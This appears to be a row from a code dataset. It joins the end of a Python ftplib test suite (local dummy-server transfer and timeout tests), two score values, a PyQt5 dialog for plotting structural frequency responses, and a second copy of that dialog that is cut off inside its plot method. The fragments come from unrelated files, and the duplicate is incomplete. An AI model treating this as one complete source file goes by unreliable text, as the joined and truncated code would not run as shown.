self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = StringIO.StringIO(RETR_DATA)
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storlines(self):
f = StringIO.StringIO(RETR_DATA.replace('\r\n', '\n'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
self.client.makeport()
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'pasv')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
self.client.makeport()
self.assertEqual(self.server.handler.last_received_cmd, 'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
self.assertEqual(self.server.handler.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send("1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
| 0.480479 | 0.143518 |
from PyQt5.QtWidgets import QLineEdit, QDialog, QFileDialog, QWidget, QTreeWidget, QToolButton, QRadioButton, QMessageBox, QTreeWidgetItem, QTabWidget, QLabel, QCheckBox, QPushButton, QSpinBox
from os.path import basename
from PyQt5.QtGui import QIcon
from PyQt5.QtGui import QColor, QBrush
from PyQt5.QtCore import Qt
from PyQt5 import uic
import configparser
import os
import matplotlib.pyplot as plt
import numpy as np
from pulse.postprocessing.plot_structural_data import get_structural_frf
from data.user_input.project.printMessageInput import PrintMessageInput
window_title1 = "ERROR MESSAGE"
window_title2 = "WARNING MESSAGE"
class SnaptoCursor(object):
def __init__(self, ax, x, y, show_cursor):
self.ax = ax
self.x = x
self.y = y
self.show_cursor = show_cursor
if show_cursor:
self.vl = self.ax.axvline(x=np.min(x), ymin=np.min(y), color='k', alpha=0.3, label='_nolegend_') # the vertical line
self.hl = self.ax.axhline(color='k', alpha=0.3, label='_nolegend_') # the horizontal line
self.marker, = ax.plot(x[0], y[0], markersize=4, marker="s", color=[0,0,0], zorder=3)
# self.marker.set_label("x: %1.2f // y: %4.2e" % (self.x[0], self.y[0]))
# plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
def mouse_move(self, event):
if self.show_cursor:
if not event.inaxes: return
x, y = event.xdata, event.ydata
if x>=np.max(self.x): return
indx = np.searchsorted(self.x, [x])[0]
x = self.x[indx]
y = self.y[indx]
self.vl.set_xdata(x)
self.hl.set_ydata(y)
self.marker.set_data([x],[y])
self.marker.set_label("x: %1.2f // y: %4.2e" % (x, y))
plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
self.ax.figure.canvas.draw_idle()
class PlotStructuralFrequencyResponseInput(QDialog):
def __init__(self, project, opv, analysisMethod, frequencies, solution, *args, **kwargs):
super().__init__(*args, **kwargs)
uic.loadUi('data/user_input/ui/Plots/Results/Structural/plotStructuralFrequencyResponseInput.ui', self)
icons_path = 'data\\icons\\'
self.icon = QIcon(icons_path + 'pulse.png')
self.setWindowIcon(self.icon)
self.setWindowFlags(Qt.WindowStaysOnTopHint)
self.setWindowModality(Qt.WindowModal)
self.opv = opv
self.opv.setInputObject(self)
self.list_node_IDs = self.opv.getListPickedPoints()
self.projec = project
self.preprocessor = project.preprocessor
self.before_run = self.preprocessor.get_model_checks()
self.nodes = self.preprocessor.nodes
self.analysisMethod = analysisMethod
self.frequencies = frequencies
self.solution = solution
self.userPath = os.path.expanduser('~')
self.save_path = ""
self.node_ID = 0
self.imported_data = None
self.localDof = None
self.lineEdit_nodeID = self.findChild(QLineEdit, 'lineEdit_nodeID')
self.lineEdit_FileName = self.findChild(QLineEdit, 'lineEdit_FileName')
self.lineEdit_ImportResultsPath = self.findChild(QLineEdit, 'lineEdit_ImportResultsPath')
self.lineEdit_SaveResultsPath = self.findChild(QLineEdit, 'lineEdit_SaveResultsPath')
self.toolButton_ChooseFolderImport = self.findChild(QToolButton, 'toolButton_ChooseFolderImport')
self.toolButton_ChooseFolderImport.clicked.connect(self.choose_path_import_results)
self.toolButton_ChooseFolderExport = self.findChild(QToolButton, 'toolButton_ChooseFolderExport')
self.toolButton_ChooseFolderExport.clicked.connect(self.choose_path_export_results)
self.toolButton_ExportResults = self.findChild(QToolButton, 'toolButton_ExportResults')
self.toolButton_ExportResults.clicked.connect(self.ExportResults)
self.toolButton_ResetPlot = self.findChild(QToolButton, 'toolButton_ResetPlot')
self.toolButton_ResetPlot.clicked.connect(self.reset_imported_data)
self.lineEdit_skiprows = self.findChild(QSpinBox, 'spinBox')
self.checkBox_cursor = self.findChild(QCheckBox, 'checkBox_cursor')
self.cursor = self.checkBox_cursor.isChecked()
self.checkBox_cursor.clicked.connect(self.update_cursor)
self.radioButton_ux = self.findChild(QRadioButton, 'radioButton_ux')
self.radioButton_uy = self.findChild(QRadioButton, 'radioButton_uy')
self.radioButton_uz = self.findChild(QRadioButton, 'radioButton_uz')
self.radioButton_rx = self.findChild(QRadioButton, 'radioButton_rx')
self.radioButton_ry = self.findChild(QRadioButton, 'radioButton_ry')
self.radioButton_rz = self.findChild(QRadioButton, 'radioButton_rz')
self.Ux = self.radioButton_ux.isChecked()
self.Uy = self.radioButton_uy.isChecked()
self.Uz = self.radioButton_uz.isChecked()
self.Rx = self.radioButton_rx.isChecked()
self.Ry = self.radioButton_ry.isChecked()
self.Rz = self.radioButton_rz.isChecked()
self.radioButton_plotAbs = self.findChild(QRadioButton, 'radioButton_plotAbs')
self.radioButton_plotReal = self.findChild(QRadioButton, 'radioButton_plotReal')
self.radioButton_plotImag = self.findChild(QRadioButton, 'radioButton_plotImag')
self.radioButton_plotAbs.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotReal.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotImag.clicked.connect(self.radioButtonEvent_YAxis)
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
self.radioButton_Absolute = self.findChild(QRadioButton, 'radioButton_Absolute')
self.radioButton_Real_Imaginary = self.findChild(QRadioButton, 'radioButton_Real_Imaginary')
self.radioButton_Absolute.clicked.connect(self.radioButtonEvent_save_data)
self.radioButton_Real_Imaginary.clicked.connect(self.radioButtonEvent_save_data)
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
self.radioButton_NoneDiff = self.findChild(QRadioButton, 'radioButton_NoneDiff')
self.radioButton_SingleDiff = self.findChild(QRadioButton, 'radioButton_SingleDiff')
self.radioButton_DoubleDiff = self.findChild(QRadioButton, 'radioButton_DoubleDiff')
self.radioButton_NoneDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.radioButton_SingleDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.radioButton_DoubleDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.NoneDiff = self.radioButton_NoneDiff.isChecked()
self.SingleDiff = self.radioButton_SingleDiff.isChecked()
self.DoubleDiff = self.radioButton_DoubleDiff.isChecked()
self.tabWidget_plot_results = self.findChild(QTabWidget, "tabWidget_plot_results")
self.tab_plot = self.tabWidget_plot_results.findChild(QWidget, "tab_plot")
self.pushButton_AddImportedPlot = self.findChild(QPushButton, 'pushButton_AddImportedPlot')
self.pushButton_AddImportedPlot.clicked.connect(self.ImportResults)
self.pushButton = self.findChild(QPushButton, 'pushButton')
self.pushButton.clicked.connect(self.check)
self.writeNodes(self.list_node_IDs)
self.exec_()
def update_cursor(self):
self.cursor = self.checkBox_cursor.isChecked()
def reset_imported_data(self):
self.imported_data = None
title = "Information"
message = "The plot data has been reseted."
PrintMessageInput([title, message, window_title2])
def writeNodes(self, list_node_ids):
text = ""
for node in list_node_ids:
text += "{}, ".format(node)
self.lineEdit_nodeID.setText(text)
def update(self):
self.list_node_IDs = self.opv.getListPickedPoints()
if self.list_node_IDs != []:
self.writeNodes(self.list_node_IDs)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
self.check()
elif event.key() == Qt.Key_Escape:
self.close()
def radioButtonEvent_YAxis(self):
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
def radioButtonEvent_save_data(self):
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
def radioButtonEvent_modify_spectrum(self):
self.NoneDiff = self.radioButton_NoneDiff.isChecked()
self.SingleDiff = self.radioButton_SingleDiff.isChecked()
self.DoubleDiff = self.radioButton_DoubleDiff.isChecked()
def choose_path_import_results(self):
self.import_path, _ = QFileDialog.getOpenFileName(None, 'Open file', self.userPath, 'Files (*.dat; *.csv)')
self.import_name = basename(self.import_path)
self.lineEdit_ImportResultsPath.setText(str(self.import_path))
def ImportResults(self):
try:
skiprows = int(self.lineEdit_skiprows.text())
self.imported_data = np.loadtxt(self.import_path, delimiter=",", skiprows=skiprows)
self.legend_imported = "imported data: "+ basename(self.import_path).split(".")[0]
self.tabWidget_plot_results.setCurrentWidget(self.tab_plot)
title = "Information"
message = "The results have been imported."
PrintMessageInput([title, message, window_title2])
except Exception as e:
title = "ERROR WHILE LOADING TABLE"
message = [str(e) + " It is recommended to skip the header rows."]
PrintMessageInput([title, message[0], window_title1])
return
def choose_path_export_results(self):
self.save_path = QFileDialog.getExistingDirectory(None, 'Choose a folder to export the results', self.userPath)
self.save_name = basename(self.save_path)
self.lineEdit_SaveResultsPath.setText(str(self.save_path))
def check(self, export=False):
lineEdit_nodeID = self.lineEdit_nodeID.text()
stop, self.node_ID = self.before_run.check_input_NodeID(lineEdit_nodeID, single_ID=True)
if stop:
return True
self.localDof = None
if self.SingleDiff:
_unit_label = "m/s"
elif self.DoubleDiff:
_unit_label = "m/s²"
else:
_unit_label = "m"
if self.radioButton_ux.isChecked():
self.localDof = 0
self.localdof_label = "Ux"
self.unit_label = _unit_label
if self.radioButton_uy.isChecked():
self.localDof = 1
self.localdof_label = "Uy"
self.unit_label = _unit_label
if self.radioButton_uz.isChecked():
self.localDof = 2
self.localdof_label = "Uz"
self.unit_label = _unit_label
if self.radioButton_rx.isChecked():
self.localDof = 3
self.localdof_label = "Rx"
self.unit_label = _unit_label
if self.radioButton_ry.isChecked():
self.localDof = 4
self.localdof_label = "Ry"
self.unit_label = _unit_label
if self.radioButton_rz.isChecked():
self.localDof = 5
self.localdof_label = "Rz"
self.unit_label = _unit_label
if self.SingleDiff:
_unit_label = "rad/s"
elif self.DoubleDiff:
_unit_label = "rad/s²"
else:
_unit_label = "rad"
if not export:
self.plot()
return False
def ExportResults(self):
if self.lineEdit_FileName.text() != "":
if self.save_path != "":
self.export_path_folder = self.save_path + "/"
else:
title = "None folder selected"
message = "Plese, choose a folder before trying export the results."
PrintMessageInput([title, message, window_title1])
return
else:
title = "Empty file name"
message = "Inform a file name before trying export the results."
PrintMessageInput([title, message, window_title1])
return
if self.check(export=True):
return
freq = self.frequencies
self.export_path = self.export_path_folder + self.lineEdit_FileName.text() + ".dat"
response = self.get_response()
if self.save_Absolute:
header = ("Frequency[Hz], Real part [{}], Imaginary part [{}], Absolute [{}]").format(self.unit_label, self.unit_label, self.unit_label)
data_to_export = np.array([freq, np.real(response), np.imag(response), np.abs(response)]).T
elif self.save_Real_Imaginary:
header = ("Frequency[Hz], Real part [{}], Imaginary part [{}]").format(self.unit_label, self.unit_label)
data_to_export = np.array([freq, np.real(response), np.imag(response)]).T
np.savetxt(self.export_path, data_to_export, delimiter=",", header=header)
title = "Information"
message = "The results have been exported."
PrintMessageInput([title, message, window_title2])
def get_response(self):
response = get_structural_frf(self.preprocessor, self.solution, self.node_ID, self.localDof)
if self.SingleDiff:
output_data = response*(1j*2*np.pi)*self.frequencies
elif self.DoubleDiff:
output_data = response*((1j*2*np.pi*self.frequencies)**2)
else:
output_data = response
return output_data
def plot(self):
fig = plt.figure(figsize=[12,7])
ax = fig.add_subplot(1,1,1)
frequencies = self.frequencies
response = self.get_response()
if self.imported_data is not None:
data = self.imported_data
imported_Xvalues = data[:,0]
if self.plotAbs:
imported_Yvalues = np.abs(data[:,1] + 1j*data[:,2])
elif self.plotReal:
imported_Yvalues = data[:,1]
elif self.plotImag:
imported_Yvalues = data[:,2]
if self.plotAbs:
response = np.abs(response)
ax.set_ylabel(("Structural Response - Absolute [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
if not float(0) in response:
if self.imported_data is None:
ax.set_yscale('log', nonposy='clip')
else:
if not float(0) in imported_Yvalues:
ax.set_yscale('log', nonposy='clip')
elif self.plotReal:
response = np.real(response)
ax.set_ylabel(("Structural Response - Real [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
elif self.plotImag:
response = np.imag(response)
ax.set_ylabel(("Structural Response - Imaginary [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
#cursor = Cursor(ax)
cursor = SnaptoCursor(ax, frequencies, response, self.cursor)
plt.connect('motion_notify_event', cursor.mouse_move)
legend_label = "Response {} at node {}".format(self.localdof_label, self.node_ID)
if self.imported_data is None:
if float(0) in response or self.plotReal or self.plotImag:
if float(0) in response[1:] or self.plotReal or self.plotImag:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.semilogy(frequencies[1:], response[1:], color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
_legends = plt.legend(handles=[first_plot], labels=[legend_label], loc='upper right')
else:
if float(0) in response or float(0) in imported_Yvalues or self.plotReal or self.plotImag:
if float(0) in response[1:] or float(0) in imported_Yvalues[1:] or self.plotReal or self.plotImag:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2)
second_plot, = plt.plot(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.semilogy(frequencies[1:], response[1:], color=[1,0,0], linewidth=2, label=legend_label)
second_plot, = plt.semilogy(imported_Xvalues[1:], imported_Yvalues[1:], color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
second_plot, = plt.semilogy(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
_legends = plt.legend(handles=[first_plot, second_plot], labels=[legend_label, self.legend_imported], loc='upper right')
plt.gca().add_artist(_legends)
ax.set_title(('STRUCTURAL FREQUENCY RESPONSE - {}').format(self.analysisMethod.upper()), fontsize = 16, fontweight = 'bold')
ax.set_xlabel(('Frequency [Hz]'), fontsize = 14, fontweight = 'bold')
plt.show()
|
data/user_input/plots/structural/plotStructuralFrequencyResponseInput.py
|
from PyQt5.QtWidgets import QLineEdit, QDialog, QFileDialog, QWidget, QTreeWidget, QToolButton, QRadioButton, QMessageBox, QTreeWidgetItem, QTabWidget, QLabel, QCheckBox, QPushButton, QSpinBox
from os.path import basename
from PyQt5.QtGui import QIcon
from PyQt5.QtGui import QColor, QBrush
from PyQt5.QtCore import Qt
from PyQt5 import uic
import configparser
import os
import matplotlib.pyplot as plt
import numpy as np
from pulse.postprocessing.plot_structural_data import get_structural_frf
from data.user_input.project.printMessageInput import PrintMessageInput
window_title1 = "ERROR MESSAGE"
window_title2 = "WARNING MESSAGE"
class SnaptoCursor(object):
def __init__(self, ax, x, y, show_cursor):
self.ax = ax
self.x = x
self.y = y
self.show_cursor = show_cursor
if show_cursor:
self.vl = self.ax.axvline(x=np.min(x), ymin=np.min(y), color='k', alpha=0.3, label='_nolegend_') # the vertical line
self.hl = self.ax.axhline(color='k', alpha=0.3, label='_nolegend_') # the horizontal line
self.marker, = ax.plot(x[0], y[0], markersize=4, marker="s", color=[0,0,0], zorder=3)
# self.marker.set_label("x: %1.2f // y: %4.2e" % (self.x[0], self.y[0]))
# plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
def mouse_move(self, event):
if self.show_cursor:
if not event.inaxes: return
x, y = event.xdata, event.ydata
if x>=np.max(self.x): return
indx = np.searchsorted(self.x, [x])[0]
x = self.x[indx]
y = self.y[indx]
self.vl.set_xdata(x)
self.hl.set_ydata(y)
self.marker.set_data([x],[y])
self.marker.set_label("x: %1.2f // y: %4.2e" % (x, y))
plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
self.ax.figure.canvas.draw_idle()
class PlotStructuralFrequencyResponseInput(QDialog):
def __init__(self, project, opv, analysisMethod, frequencies, solution, *args, **kwargs):
super().__init__(*args, **kwargs)
uic.loadUi('data/user_input/ui/Plots/Results/Structural/plotStructuralFrequencyResponseInput.ui', self)
icons_path = 'data\\icons\\'
self.icon = QIcon(icons_path + 'pulse.png')
self.setWindowIcon(self.icon)
self.setWindowFlags(Qt.WindowStaysOnTopHint)
self.setWindowModality(Qt.WindowModal)
self.opv = opv
self.opv.setInputObject(self)
self.list_node_IDs = self.opv.getListPickedPoints()
self.projec = project
self.preprocessor = project.preprocessor
self.before_run = self.preprocessor.get_model_checks()
self.nodes = self.preprocessor.nodes
self.analysisMethod = analysisMethod
self.frequencies = frequencies
self.solution = solution
self.userPath = os.path.expanduser('~')
self.save_path = ""
self.node_ID = 0
self.imported_data = None
self.localDof = None
self.lineEdit_nodeID = self.findChild(QLineEdit, 'lineEdit_nodeID')
self.lineEdit_FileName = self.findChild(QLineEdit, 'lineEdit_FileName')
self.lineEdit_ImportResultsPath = self.findChild(QLineEdit, 'lineEdit_ImportResultsPath')
self.lineEdit_SaveResultsPath = self.findChild(QLineEdit, 'lineEdit_SaveResultsPath')
self.toolButton_ChooseFolderImport = self.findChild(QToolButton, 'toolButton_ChooseFolderImport')
self.toolButton_ChooseFolderImport.clicked.connect(self.choose_path_import_results)
self.toolButton_ChooseFolderExport = self.findChild(QToolButton, 'toolButton_ChooseFolderExport')
self.toolButton_ChooseFolderExport.clicked.connect(self.choose_path_export_results)
self.toolButton_ExportResults = self.findChild(QToolButton, 'toolButton_ExportResults')
self.toolButton_ExportResults.clicked.connect(self.ExportResults)
self.toolButton_ResetPlot = self.findChild(QToolButton, 'toolButton_ResetPlot')
self.toolButton_ResetPlot.clicked.connect(self.reset_imported_data)
self.lineEdit_skiprows = self.findChild(QSpinBox, 'spinBox')
self.checkBox_cursor = self.findChild(QCheckBox, 'checkBox_cursor')
self.cursor = self.checkBox_cursor.isChecked()
self.checkBox_cursor.clicked.connect(self.update_cursor)
self.radioButton_ux = self.findChild(QRadioButton, 'radioButton_ux')
self.radioButton_uy = self.findChild(QRadioButton, 'radioButton_uy')
self.radioButton_uz = self.findChild(QRadioButton, 'radioButton_uz')
self.radioButton_rx = self.findChild(QRadioButton, 'radioButton_rx')
self.radioButton_ry = self.findChild(QRadioButton, 'radioButton_ry')
self.radioButton_rz = self.findChild(QRadioButton, 'radioButton_rz')
self.Ux = self.radioButton_ux.isChecked()
self.Uy = self.radioButton_uy.isChecked()
self.Uz = self.radioButton_uz.isChecked()
self.Rx = self.radioButton_rx.isChecked()
self.Ry = self.radioButton_ry.isChecked()
self.Rz = self.radioButton_rz.isChecked()
self.radioButton_plotAbs = self.findChild(QRadioButton, 'radioButton_plotAbs')
self.radioButton_plotReal = self.findChild(QRadioButton, 'radioButton_plotReal')
self.radioButton_plotImag = self.findChild(QRadioButton, 'radioButton_plotImag')
self.radioButton_plotAbs.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotReal.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotImag.clicked.connect(self.radioButtonEvent_YAxis)
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
self.radioButton_Absolute = self.findChild(QRadioButton, 'radioButton_Absolute')
self.radioButton_Real_Imaginary = self.findChild(QRadioButton, 'radioButton_Real_Imaginary')
self.radioButton_Absolute.clicked.connect(self.radioButtonEvent_save_data)
self.radioButton_Real_Imaginary.clicked.connect(self.radioButtonEvent_save_data)
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
self.radioButton_NoneDiff = self.findChild(QRadioButton, 'radioButton_NoneDiff')
self.radioButton_SingleDiff = self.findChild(QRadioButton, 'radioButton_SingleDiff')
self.radioButton_DoubleDiff = self.findChild(QRadioButton, 'radioButton_DoubleDiff')
self.radioButton_NoneDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.radioButton_SingleDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.radioButton_DoubleDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.NoneDiff = self.radioButton_NoneDiff.isChecked()
self.SingleDiff = self.radioButton_SingleDiff.isChecked()
self.DoubleDiff = self.radioButton_DoubleDiff.isChecked()
self.tabWidget_plot_results = self.findChild(QTabWidget, "tabWidget_plot_results")
self.tab_plot = self.tabWidget_plot_results.findChild(QWidget, "tab_plot")
self.pushButton_AddImportedPlot = self.findChild(QPushButton, 'pushButton_AddImportedPlot')
self.pushButton_AddImportedPlot.clicked.connect(self.ImportResults)
self.pushButton = self.findChild(QPushButton, 'pushButton')
self.pushButton.clicked.connect(self.check)
self.writeNodes(self.list_node_IDs)
self.exec_()
def update_cursor(self):
self.cursor = self.checkBox_cursor.isChecked()
def reset_imported_data(self):
self.imported_data = None
title = "Information"
message = "The plot data has been reseted."
PrintMessageInput([title, message, window_title2])
def writeNodes(self, list_node_ids):
text = ""
for node in list_node_ids:
text += "{}, ".format(node)
self.lineEdit_nodeID.setText(text)
def update(self):
self.list_node_IDs = self.opv.getListPickedPoints()
if self.list_node_IDs != []:
self.writeNodes(self.list_node_IDs)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
self.check()
elif event.key() == Qt.Key_Escape:
self.close()
def radioButtonEvent_YAxis(self):
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
def radioButtonEvent_save_data(self):
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
def radioButtonEvent_modify_spectrum(self):
self.NoneDiff = self.radioButton_NoneDiff.isChecked()
self.SingleDiff = self.radioButton_SingleDiff.isChecked()
self.DoubleDiff = self.radioButton_DoubleDiff.isChecked()
def choose_path_import_results(self):
self.import_path, _ = QFileDialog.getOpenFileName(None, 'Open file', self.userPath, 'Files (*.dat; *.csv)')
self.import_name = basename(self.import_path)
self.lineEdit_ImportResultsPath.setText(str(self.import_path))
def ImportResults(self):
try:
skiprows = int(self.lineEdit_skiprows.text())
self.imported_data = np.loadtxt(self.import_path, delimiter=",", skiprows=skiprows)
self.legend_imported = "imported data: "+ basename(self.import_path).split(".")[0]
self.tabWidget_plot_results.setCurrentWidget(self.tab_plot)
title = "Information"
message = "The results have been imported."
PrintMessageInput([title, message, window_title2])
except Exception as e:
title = "ERROR WHILE LOADING TABLE"
message = [str(e) + " It is recommended to skip the header rows."]
PrintMessageInput([title, message[0], window_title1])
return
def choose_path_export_results(self):
self.save_path = QFileDialog.getExistingDirectory(None, 'Choose a folder to export the results', self.userPath)
self.save_name = basename(self.save_path)
self.lineEdit_SaveResultsPath.setText(str(self.save_path))
def check(self, export=False):
lineEdit_nodeID = self.lineEdit_nodeID.text()
stop, self.node_ID = self.before_run.check_input_NodeID(lineEdit_nodeID, single_ID=True)
if stop:
return True
self.localDof = None
if self.SingleDiff:
_unit_label = "m/s"
elif self.DoubleDiff:
_unit_label = "m/s²"
else:
_unit_label = "m"
if self.radioButton_ux.isChecked():
self.localDof = 0
self.localdof_label = "Ux"
self.unit_label = _unit_label
if self.radioButton_uy.isChecked():
self.localDof = 1
self.localdof_label = "Uy"
self.unit_label = _unit_label
if self.radioButton_uz.isChecked():
self.localDof = 2
self.localdof_label = "Uz"
self.unit_label = _unit_label
if self.radioButton_rx.isChecked():
self.localDof = 3
self.localdof_label = "Rx"
self.unit_label = _unit_label
if self.radioButton_ry.isChecked():
self.localDof = 4
self.localdof_label = "Ry"
self.unit_label = _unit_label
if self.radioButton_rz.isChecked():
self.localDof = 5
self.localdof_label = "Rz"
self.unit_label = _unit_label
if self.SingleDiff:
_unit_label = "rad/s"
elif self.DoubleDiff:
_unit_label = "rad/s²"
else:
_unit_label = "rad"
if not export:
self.plot()
return False
def ExportResults(self):
if self.lineEdit_FileName.text() != "":
if self.save_path != "":
self.export_path_folder = self.save_path + "/"
else:
title = "None folder selected"
message = "Plese, choose a folder before trying export the results."
PrintMessageInput([title, message, window_title1])
return
else:
title = "Empty file name"
message = "Inform a file name before trying export the results."
PrintMessageInput([title, message, window_title1])
return
if self.check(export=True):
return
freq = self.frequencies
self.export_path = self.export_path_folder + self.lineEdit_FileName.text() + ".dat"
response = self.get_response()
if self.save_Absolute:
header = ("Frequency[Hz], Real part [{}], Imaginary part [{}], Absolute [{}]").format(self.unit_label, self.unit_label, self.unit_label)
data_to_export = np.array([freq, np.real(response), np.imag(response), np.abs(response)]).T
elif self.save_Real_Imaginary:
header = ("Frequency[Hz], Real part [{}], Imaginary part [{}]").format(self.unit_label, self.unit_label)
data_to_export = np.array([freq, np.real(response), np.imag(response)]).T
np.savetxt(self.export_path, data_to_export, delimiter=",", header=header)
title = "Information"
message = "The results have been exported."
PrintMessageInput([title, message, window_title2])
def get_response(self):
response = get_structural_frf(self.preprocessor, self.solution, self.node_ID, self.localDof)
if self.SingleDiff:
output_data = response*(1j*2*np.pi)*self.frequencies
elif self.DoubleDiff:
output_data = response*((1j*2*np.pi*self.frequencies)**2)
else:
output_data = response
return output_data
def plot(self):
fig = plt.figure(figsize=[12,7])
ax = fig.add_subplot(1,1,1)
frequencies = self.frequencies
response = self.get_response()
if self.imported_data is not None:
data = self.imported_data
